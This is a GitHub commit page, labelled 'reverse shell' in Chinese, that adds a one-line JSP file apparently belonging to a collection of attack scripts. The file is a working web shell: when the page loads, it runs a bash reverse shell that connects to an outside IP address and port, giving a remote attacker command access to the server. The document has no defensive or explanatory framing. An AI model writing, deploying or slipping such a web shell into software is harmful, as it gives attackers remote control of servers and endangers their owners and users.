Skip to content

Commit c2836e5

Browse files
committed
反弹shell
1 parent 559c462 commit c2836e5

File tree

1 file changed

+1
-0
lines changed

1 file changed

+1
-0
lines changed

Jsp/反弹/shell.jsp

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
<%try { Runtime run = Runtime.getRuntime(); run.exec("bash -i >& /dev/tcp/123.45.67.89/9999 0>&1"); } catch (IOException e) { }%>

0 commit comments

Comments
 (0)